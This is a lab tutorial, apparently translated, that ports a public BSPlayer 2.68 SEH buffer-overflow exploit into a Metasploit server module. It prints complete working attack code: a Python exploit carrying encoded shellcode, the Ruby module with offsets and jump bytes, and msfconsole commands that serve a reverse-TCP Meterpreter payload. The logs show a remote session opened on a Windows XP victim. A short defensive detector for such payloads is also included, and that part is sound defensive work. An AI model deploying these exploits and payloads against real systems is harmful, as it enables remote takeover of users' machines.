Importing a TCP-server / browser-based exploit module into Metasploit
I. Lab environment
Attacker machine:
kali 2019-3 (10.10.10.153)
Target machine:
Windows XP Professional 1 (10.10.10.132)
Vulnerability:
BSplayer 2.68, download: https://www.exploit-db.com/exploits/36477/
The vulnerability lies in how the player parses the response from a remote server.
II. Exploitation with Python
1. Python exploit code:
#!/usr/bin/python
'''
Bsplayer suffers from a buffer overflow vulnerability when processing the HTTP response when opening a URL.
In order to exploit this bug I partially overwrited the seh record to land at pop pop ret instead of the full address and then used backward jumping to jump to a long jump that eventually land in my shellcode.
Tested on : windows xp sp1 - windows 7 sp1 - Windows 8 Enterprise
it might work in other versions as well just give it a try :)
My twitter: @fady_osman
My youtube: https://www.youtube.com/user/cutehack3r
'''
import socket
import sys

s = socket.socket()          # Create a socket object
if(len(sys.argv) < 3):
    print "[x] Please enter an IP and port to listen to."
    print "[x] " + sys.argv[0] + " ip port"
    exit()
host = sys.argv[1]           # Ip to listen to.
port = int(sys.argv[2])      # Reserve a port for your service.
s.bind((host, port))         # Bind to the port
print "[*] Listening on port " + str(port)
s.listen(5)                  # Now wait for client connection.
c, addr = s.accept()         # Establish connection with client.
# Sending the m3u file so we can reconnect to our server to send both the flv file and later the payload.
print(('[*] Sending the payload first time', addr))
c.recv(1024)

# seh and nseh.
buf = ""
buf += "\xbb\xe4\xf3\xb8\x70\xda\xc0\xd9\x74\x24\xf4\x58\x31"
buf += "\xc9\xb1\x33\x31\x58\x12\x83\xc0\x04\x03\xbc\xfd\x5a"
buf += "\x85\xc0\xea\x12\x66\x38\xeb\x44\xee\xdd\xda\x56\x94"
buf += "\x96\x4f\x67\xde\xfa\x63\x0c\xb2\xee\xf0\x60\x1b\x01"
buf += "\xb0\xcf\x7d\x2c\x41\xfe\x41\xe2\x81\x60\x3e\xf8\xd5"
buf += "\x42\x7f\x33\x28\x82\xb8\x29\xc3\xd6\x11\x26\x76\xc7"
buf += "\x16\x7a\x4b\xe6\xf8\xf1\xf3\x90\x7d\xc5\x80\x2a\x7f"
buf += "\x15\x38\x20\x37\x8d\x32\x6e\xe8\xac\x97\x6c\xd4\xe7"
buf += "\x9c\x47\xae\xf6\x74\x96\x4f\xc9\xb8\x75\x6e\xe6\x34"
buf += "\x87\xb6\xc0\xa6\xf2\xcc\x33\x5a\x05\x17\x4e\x80\x80"
buf += "\x8a\xe8\x43\x32\x6f\x09\x87\xa5\xe4\x05\x6c\xa1\xa3"
buf += "\x09\x73\x66\xd8\x35\xf8\x89\x0f\xbc\xba\xad\x8b\xe5"
buf += "\x19\xcf\x8a\x43\xcf\xf0\xcd\x2b\xb0\x54\x85\xd9\xa5"
buf += "\xef\xc4\xb7\x38\x7d\x73\xfe\x3b\x7d\x7c\x50\x54\x4c"
buf += "\xf7\x3f\x23\x51\xd2\x04\xdb\x1b\x7f\x2c\x74\xc2\x15"
buf += "\x6d\x19\xf5\xc3\xb1\x24\x76\xe6\x49\xd3\x66\x83\x4c"
buf += "\x9f\x20\x7f\x3c\xb0\xc4\x7f\x93\xb1\xcc\xe3\x72\x22"
buf += "\x8c\xcd\x11\xc2\x37\x12"

jmplong = "\xe9\x85\xe9\xff\xff"
nseh = "\xeb\xf9\x90\x90"
# Partially overwriting the seh record (nulls are ignored).
seh = "\x3b\x58\x00\x00"
buflen = len(buf)
response = "\x90" * 2048 + buf + "\xcc" * (6787 - 2048 - buflen) + jmplong + nseh + seh  #+ "\xcc" * 7000
c.send(response)
c.close()

c, addr = s.accept()         # Establish connection with client.
# Sending the m3u file so we can reconnect to our server to send both the flv file and later the payload.
print(('[*] Sending the payload second time', addr))
c.recv(1024)
c.send(response)
c.close()
s.close()
2. Brief code analysis:
- The author placed the shellcode after 2048 NOPs, but this does not mean the actual offset is 2048; the shellcode is placed before the SEH overwrite area because enough space must be reserved for it.
- \xcc is the breakpoint (int3) opcode, but in this exploit it is used purely as padding.
- The variable jmplong holds the backward jump that lands in the shellcode.
- The nseh variable holds the address of the next frame, i.e. the short jump discussed in the previous chapter.
- The seh variable holds the address of the P/P/R (POP-POP-RETN) instruction sequence.
3. Testing
- If the calculator pops up, it worked!
III. Creating the Metasploit module
1. Information needed for the exploit
Offset: 2048
Address of a known POP-POP-RETN sequence (P-P-R) in memory: 0x0000583b
Backward jump / long jump to the shellcode: \xe9\x85\xe9\xff\xff
Short jump / pointer to the next SEH frame: \xeb\xf9\x90\x90
Note
One thing must be pointed out: in this scenario the target machine has to connect to our exploit server, rather than us connecting to the target. Our exploit server must therefore be listening for incoming connections at all times, and when a request from the target arrives it sends the malicious content back.
2. Exploit code
class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::TcpServer

  def initialize(info={})
    super(update_info(info,
      'Name'           => "BsPlayer 2.68 SEH Overflow Exploit",
      'Description'    => %q{
        Here's an example of Server Based Exploit
      },
      'Author'         => [ 'z9m8r8' ],
      'Platform'       => 'windows',
      'Targets'        =>
        [
          [ 'Generic', {'Ret' => 0x0000583b, 'Offset' => 2048} ],
        ],
      'Payload'        => { 'BadChars' => "\x00\x0a\x20\x0d" },
      'DisclosureDate' => "10 19 2021",
      'DefaultTarget'  => 0))
  end

  def on_client_connect(client)
    return if ((p = regenerate_payload(client)) == nil)
    print_status("Client Connected")
    sploit = make_nops(target['Offset'])
    sploit << payload.encoded
    sploit << "\xcc" * (6787 - 2048 - payload.encoded.length)
    sploit << "\xe9\x85\xe9\xff\xff"
    sploit << "\xeb\xf9\x90\x90"
    sploit << [target.ret].pack('V')
    client.put(sploit)
    client.get_once
    client.put(sploit)
    handler(client)
    service.close_client(client)
  end
end
3. Brief code analysis
The TCP server library (Msf::Exploit::Remote::TcpServer) provides the methods needed to handle incoming requests, plus extra options such as SRVHOST, SRVPORT and SSL.
client.put(sploit): sends the malicious data to the target.
client.get_once: this module has to send data to the target twice, so client.get_once is used between the two sends to ensure the data actually goes out as two separate pieces; otherwise the two chunks could be merged into a single unit and sent together.
handler(client): looks for the session returned from the exploit.
The code works with a client object because each incoming request from a given target is treated as an independent object, which allows several targets to connect at the same time.
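As an added defender-side example (not code from this page, from the original exploit or from Metasploit): a heuristic that inspects a server response body for the layout described in sections II and III above, i.e. a long NOP sled, int3 (0xCC) filler and backward jumps, which is what a proxy or network sensor could look for when a media player fetches a URL. The sample bodies are constructed, with placeholder bytes standing in for shellcode; the thresholds are assumptions.

```python
# Heuristic detector for SEH-overflow style payloads in an HTTP response body.
# Added defensive example, modelled on the response layout this page describes.
import re

NOP_SLED_MIN = 512   # assumed threshold: playlists never contain hundreds of 0x90 bytes
CC_FILL_MIN = 256    # assumed threshold: int3 padding is another strong indicator
SHORT_JMP_BACK = re.compile(rb"\xeb[\x80-\xff]")            # jmp short, negative displacement
LONG_JMP_BACK = re.compile(rb"\xe9..\xff\xff", re.DOTALL)   # jmp rel32, negative displacement

def longest_run(data: bytes, byte: int) -> int:
    """Length of the longest consecutive run of `byte` in data."""
    best = cur = 0
    for b in data:
        cur = cur + 1 if b == byte else 0
        best = max(best, cur)
    return best

def analyze_response(body: bytes) -> dict:
    """Return the individual indicators so an analyst can see which ones fired."""
    return {
        "length": len(body),
        "nop_sled": longest_run(body, 0x90),
        "cc_fill": longest_run(body, 0xCC),
        "short_jmp_back": bool(SHORT_JMP_BACK.search(body)),
        "long_jmp_back": bool(LONG_JMP_BACK.search(body)),
    }

def is_suspicious(body: bytes) -> bool:
    """Flag a body that carries a sled or filler run together with a backward jump."""
    ind = analyze_response(body)
    sled_or_fill = ind["nop_sled"] >= NOP_SLED_MIN or ind["cc_fill"] >= CC_FILL_MIN
    return sled_or_fill and (ind["short_jmp_back"] or ind["long_jmp_back"])

# Constructed samples (not real traffic): a benign playlist, and a body laid out
# like the page's response with placeholder bytes instead of shellcode.
BENIGN = b"#EXTM3U\r\n#EXTINF:-1,demo\r\nhttp://127.0.0.1/demo.flv\r\n"
FAKE_SHELLCODE = b"A" * 300   # placeholder, not executable code
SUSPICIOUS = (b"\x90" * 2048 + FAKE_SHELLCODE
              + b"\xcc" * (6787 - 2048 - len(FAKE_SHELLCODE))
              + b"\xe9\x85\xe9\xff\xff" + b"\xeb\xf9\x90\x90" + b"\x3b\x58\x00\x00")

if __name__ == "__main__":
    for name, body in (("benign", BENIGN), ("suspicious", SUSPICIOUS)):
        print(name, is_suspicious(body), analyze_response(body))
```

A rule like this is a triage aid, not a signature: it will also fire on any large binary response with long byte runs, so pair it with the context of which client requested the URL.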
IV. Testing in msf
1. Operations on Kali (msf)
msf5 > use exploit/windows/z9m8r8_test/bsplayer2_68_seh_overflow_z9m8r8
msf5 exploit(windows/z9m8r8_test/bsplayer2_68_seh_overflow_z9m8r8) > set srvhost 10.10.10.153
srvhost => 10.10.10.153
msf5 exploit(windows/z9m8r8_test/bsplayer2_68_seh_overflow_z9m8r8) > set srvport 8080
srvport => 8080
msf5 exploit(windows/z9m8r8_test/bsplayer2_68_seh_overflow_z9m8r8) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(windows/z9m8r8_test/bsplayer2_68_seh_overflow_z9m8r8) > set lhost 10.10.10.153
lhost => 10.10.10.153
msf5 exploit(windows/z9m8r8_test/bsplayer2_68_seh_overflow_z9m8r8) > set lport 8888
lport => 8888
msf5 exploit(windows/z9m8r8_test/bsplayer2_68_seh_overflow_z9m8r8) > exploit
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 10.10.10.153:8888
[*] Started service listener on 10.10.10.153:8080
[*] Server started.
2. Operations on the XP side
Start BSplayer on XP and open the URL: http://10.10.10.153:8080
- When XP tries to establish a connection to the exploit server (Kali), the Meterpreter payload is sent to XP, and Kali ends up with Meterpreter control.
3. Result on the Kali side:
msf5 exploit(windows/z9m8r8_test/bsplayer2_68_seh_overflow_z9m8r8) >
[*] Client Connected
[*] Client Connected
[*] Sending stage (179779 bytes) to 10.10.10.132
[*] Meterpreter session 1 opened (10.10.10.153:8888 -> 10.10.10.132:1105) at 2021-10-03 05:29:14 -0400
pwd
[*] exec: pwd
/root
msf5 exploit(windows/z9m8r8_test/bsplayer2_68_seh_overflow_z9m8r8) > sessions

Active sessions
===============

  Id  Name  Type                     Information                             Connection
  --  ----  ----                     -----------                             ----------
  1         meterpreter x86/windows  WINXP-Z9M8R8-1\z9m8r8 @ WINXP-Z9M8R8-1  10.10.10.153:8888 -> 10.10.10.132:1105 (10.10.10.132)

msf5 exploit(windows/z9m8r8_test/bsplayer2_68_seh_overflow_z9m8r8) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > getuid
Server username: WINXP-Z9M8R8-1\z9m8r8
meterpreter > sysinfo
Computer        : WINXP-Z9M8R8-1
OS              : Windows XP (Build 2600, Service Pack 2).
Architecture    : x86
System Language : zh_CN
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter >
V. References
《精通Metasploit渗透测试》 (Chinese edition of Mastering Metasploit)